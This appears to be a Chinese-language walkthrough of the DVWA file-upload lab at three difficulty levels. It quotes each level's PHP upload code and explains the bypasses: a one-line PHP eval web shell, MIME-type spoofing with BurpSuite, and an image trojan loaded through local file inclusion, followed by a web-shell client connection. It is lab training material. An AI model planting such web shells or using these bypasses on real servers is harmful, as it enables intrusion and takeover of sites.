低级难度
先来看一下源代码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
可以看到没有对上传的文件做任何的检查、过滤,直接传一句话木马
<?php @eval($_POST['777']) ?>
访问上传的文件所在路径
http://192.168.40.131/DVWA-master/hackable/uploads/1.php
连接成功
中级难度
先来看一下源代码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
可以看到限制了文件类型(image/jpeg或image/png)和文件大小(100000字节),那么只需要修改一下文件类型就行了【不要混淆文件类型和文件后缀名】
1:使用BurpSuite截取原始数据包
2:修改文件类型,并显示上传成功
高级难度
源代码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; //文件在上传者机器上的文件名
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); //上传文件的后缀名
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; //上传文件的大小
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; //上传文件保存在服务器临时文件夹的文件名
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext )=="jpeg" || strtolower( $uploaded_ext ) == "png" ) &&( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
可以看到,主要是限制了文件后缀,那就用图片木马
然后你会发现,上传失败,用记事本打开2.jpg发现一句话木马写在了文件的开头
正确生成图片木马的姿势:
这个时候就需要借助文件包含漏洞了,而文件包含漏洞的高级难度模式里,限制了只能只用本地文件包含,所以我们需要提前知道自己上传的文件在哪。
在我搭建的环境里面,上传的文件在这里C:\phpstudy\WWW\DVWA-master\hackable\uploads
然后本地文件包含:
然后就可以连接蚁剑了